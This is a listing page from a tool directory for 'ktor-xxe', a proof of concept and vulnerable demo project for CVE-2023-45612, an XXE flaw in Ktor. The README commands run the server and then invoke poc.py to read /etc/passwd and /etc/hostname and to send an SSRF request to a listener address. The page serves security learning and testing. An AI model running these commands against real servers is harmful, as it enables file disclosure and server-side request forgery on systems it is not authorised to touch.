Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
ktor-xxe — CVE-2023-45612 POC and vulnerable project. | Kitploit
Tools/GitHubGitHub/seraphimi/ktor-xxe
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubseraphimi/ktor-xxe

ktor-xxe

CVE-2023-45612 POC and vulnerable project.

View Repository
9 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

ktor-xxe

Run the project with :

| ./gradlew run | Run the server |

If the server starts successfully, you'll see the following output:

root@kitploit:~
2024-12-04 14:32:45.584 [main] INFO  Application - Application started in 0.303 seconds.
2024-12-04 14:32:45.682 [main] INFO  Application - Responding at http://0.0.0.0:8080

To utilize the XXE poc:

File disclosure

root@kitploit:~
python3 poc.py http://localhost:8080 --file /etc/hostname
python3 poc.py http://localhost:8080 --file /etc/passwd

SSRF

root@kitploit:~
python3 poc.py http://localhost:8080 --url http://listeneraddress/
Download Tool